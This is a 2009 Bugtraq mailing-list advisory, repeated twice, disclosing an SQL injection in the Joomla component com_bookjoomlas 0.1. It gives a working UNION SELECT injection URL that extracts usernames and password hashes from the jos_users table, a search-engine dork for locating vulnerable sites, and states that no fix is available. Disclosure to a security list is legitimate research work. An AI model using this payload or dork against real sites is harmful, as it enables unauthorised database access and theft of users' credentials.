Joomla Component com_bookjoomlas SQL Injection Vulnerability
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Joomla Component com_bookjoomlas SQL Injection Vulnerability
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 6 Apr 2009 11:13:44 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=lthuiqa3VQNrT+7doApccpf7f5Oj5uJNJ77rBDXuwpg=; b=xd37Iba3zJbe2tfDRfMA6W7MfDfszRFKbbPyEcfAFtmTa55Wo45j19VH5y3ZTYZd+A 6aInxK9DR/cYmr8UB+h+HaQaQt+shXdErFwWe8KY4YeDUi/NUBPs+x3wnn3aBxYhdINL mVVIRuzSQ/ylAJkNCAaVsug2526PVMonoPP+o=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=m6zBzl4ANSaofI6Jivn+kC8Wh4TywdM/+EsB92PUVTV7W26+oPQoqVDxmENzWSoBEi NN+0ZmEAdYIXF6SlvISfEEDvy0f5AZwsOiPej7ClQGXsKOuvHsMmp5rC4FvkAwL59sgQ ZhzH4m70rCZ5UV2RTJlSk457B9pc88MXye9Uo=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Joomla Component com_bookjoomlas
[+] Version: 0.1
[+] Website: http://www.alikonweb.it
[+] Bugs: [A] SQL Injection
[+] Exploitation: Remote
[+] Dork: inurl:"index.php?option=com_bookjoomlas"
[+] Date: 06 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulate to write
files on system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1
UNION ALL SELECT
1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16
FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Joomla Component com_bookjoomlas
[+] Version: 0.1
[+] Website: http://www.alikonweb.it
[+] Bugs: [A] SQL Injection
[+] Exploitation: Remote
[+] Dork: inurl:"index.php?option=com_bookjoomlas"
[+] Date: 06 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] Security risk: low
[-] File affected: sub_commententry.php
This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulate to write
files on system.
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1
UNION ALL SELECT
1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16
FROM jos_users
*************************************************
[+] Fix
No fix.
*************************************************